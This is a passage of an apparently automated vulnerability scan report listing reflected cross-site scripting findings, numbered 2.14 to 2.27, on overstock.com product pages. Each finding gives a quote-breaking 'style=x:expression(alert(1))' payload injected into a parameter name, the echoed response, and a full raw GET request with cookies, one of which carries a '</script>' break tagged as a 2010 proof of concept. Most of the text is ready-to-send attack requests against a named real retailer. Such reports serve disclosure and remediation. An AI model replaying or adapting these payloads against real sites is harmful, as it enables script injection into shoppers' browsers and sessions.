GET /Clothing-Shoes/Amerileather-Kylie-Leather-Handbag/5045672/product.html?18c8b"style%3d"x%3aexpression(alert(1))"366dab40ca2=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.14. http://www.overstock.com/Clothing-Shoes/Amerileather-Large-Universal-Shoulder-Bag/3011906/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 840a2"style%3d"x%3aexpression(alert(1))"5ec9222a23b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 840a2"style="x:expression(alert(1))"5ec9222a23b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Amerileather-Large-Universal-Shoulder-Bag/3011906/product.html?840a2"style%3d"x%3aexpression(alert(1))"5ec9222a23b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.15. http://www.overstock.com/Clothing-Shoes/Amerileather-Mens-Distressed-Brown-Leather-Bomber-Jacket/22704/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77fe0"style%3d"x%3aexpression(alert(1))"15d03d4ed59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77fe0"style="x:expression(alert(1))"15d03d4ed59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Amerileather-Mens-Distressed-Brown-Leather-Bomber-Jacket/22704/product.html?77fe0"style%3d"x%3aexpression(alert(1))"15d03d4ed59=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.16. http://www.overstock.com/Clothing-Shoes/Ann-Loren-Boutique-Girls-Jungle-Dress-and-Pant-Set/5093405/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3eb0"style%3d"x%3aexpression(alert(1))"cffb449a7f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3eb0"style="x:expression(alert(1))"cffb449a7f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Ann-Loren-Boutique-Girls-Jungle-Dress-and-Pant-Set/5093405/product.html?f3eb0"style%3d"x%3aexpression(alert(1))"cffb449a7f1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.17. http://www.overstock.com/Clothing-Shoes/Ann-Loren-Girls-2-piece-High-Fashion-Tutu-Outfit/5137568/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9824"style%3d"x%3aexpression(alert(1))"c26b1ff405c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9824"style="x:expression(alert(1))"c26b1ff405c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Ann-Loren-Girls-2-piece-High-Fashion-Tutu-Outfit/5137568/product.html?c9824"style%3d"x%3aexpression(alert(1))"c26b1ff405c=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.18. http://www.overstock.com/Clothing-Shoes/AnnLoren-2-piece-Jungle-Rumba-Girls-Outfit/3416935/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf911"style%3d"x%3aexpression(alert(1))"f07ee28680b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cf911"style="x:expression(alert(1))"f07ee28680b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/AnnLoren-2-piece-Jungle-Rumba-Girls-Outfit/3416935/product.html?cf911"style%3d"x%3aexpression(alert(1))"f07ee28680b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.19. http://www.overstock.com/Clothing-Shoes/AnnLoren-Boutique-Girls-Pink-Safari-Rumba-2-piece-Set/4084522/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b826f"style%3d"x%3aexpression(alert(1))"c70ef4a1e21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b826f"style="x:expression(alert(1))"c70ef4a1e21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/AnnLoren-Boutique-Girls-Pink-Safari-Rumba-2-piece-Set/4084522/product.html?b826f"style%3d"x%3aexpression(alert(1))"c70ef4a1e21=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.20. http://www.overstock.com/Clothing-Shoes/Bamboo-by-Journee-Womens-Slouch-Boots-with-Buckle/3469442/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8bff"style%3d"x%3aexpression(alert(1))"c97f61e0979 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8bff"style="x:expression(alert(1))"c97f61e0979 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Bamboo-by-Journee-Womens-Slouch-Boots-with-Buckle/3469442/product.html?f8bff"style%3d"x%3aexpression(alert(1))"c97f61e0979=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.21. http://www.overstock.com/Clothing-Shoes/Bamboo-by-Journee-Womens-Slouchy-Microsuede-Boots/3830685/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2988"style%3d"x%3aexpression(alert(1))"e89b9f54e41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e2988"style="x:expression(alert(1))"e89b9f54e41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Bamboo-by-Journee-Womens-Slouchy-Microsuede-Boots/3830685/product.html?e2988"style%3d"x%3aexpression(alert(1))"e89b9f54e41=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.22. http://www.overstock.com/Clothing-Shoes/Black-Flys-Polarized-Micro-Flys-Sunglasses/1579444/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca6ff"style%3d"x%3aexpression(alert(1))"b12bf9c7c1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca6ff"style="x:expression(alert(1))"b12bf9c7c1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Black-Flys-Polarized-Micro-Flys-Sunglasses/1579444/product.html?ca6ff"style%3d"x%3aexpression(alert(1))"b12bf9c7c1e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.23. http://www.overstock.com/Clothing-Shoes/Boston-Traveler-Mens-Suede-Moccasin-Slippers/4146348/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b5e7"style%3d"x%3aexpression(alert(1))"d793ce90ed2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7b5e7"style="x:expression(alert(1))"d793ce90ed2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Boston-Traveler-Mens-Suede-Moccasin-Slippers/4146348/product.html?7b5e7"style%3d"x%3aexpression(alert(1))"d793ce90ed2=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.24. http://www.overstock.com/Clothing-Shoes/Brooks-Womens-Adrenaline-ASR-6-Athletic-Shoes/4726004/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0d68"style%3d"x%3aexpression(alert(1))"abff08642e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0d68"style="x:expression(alert(1))"abff08642e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Brooks-Womens-Adrenaline-ASR-6-Athletic-Shoes/4726004/product.html?b0d68"style%3d"x%3aexpression(alert(1))"abff08642e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.25. http://www.overstock.com/Clothing-Shoes/Cashmere-Showroom-Signature-Cashmere-Oversized-Scarf/4141562/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 941de"style%3d"x%3aexpression(alert(1))"3a880e61ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 941de"style="x:expression(alert(1))"3a880e61ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Cashmere-Showroom-Signature-Cashmere-Oversized-Scarf/4141562/product.html?941de"style%3d"x%3aexpression(alert(1))"3a880e61ac=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.26. http://www.overstock.com/Clothing-Shoes/Collezione-Mens-Lambskin-Leather-Jacket/3920123/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b03f"style%3d"x%3aexpression(alert(1))"e0cdb060d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5b03f"style="x:expression(alert(1))"e0cdb060d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Collezione-Mens-Lambskin-Leather-Jacket/3920123/product.html?5b03f"style%3d"x%3aexpression(alert(1))"e0cdb060d8=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.27. http://www.overstock.com/Clothing-Shoes/DKNY-Womens-Long-Quilted-Zip-front-Down-Coat/5129186/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3b05"style%3d"x%3aexpression(alert(1))"7c4fc8bbbe7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3b05"style="x:expression(alert(1))"7c4fc8bbbe7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
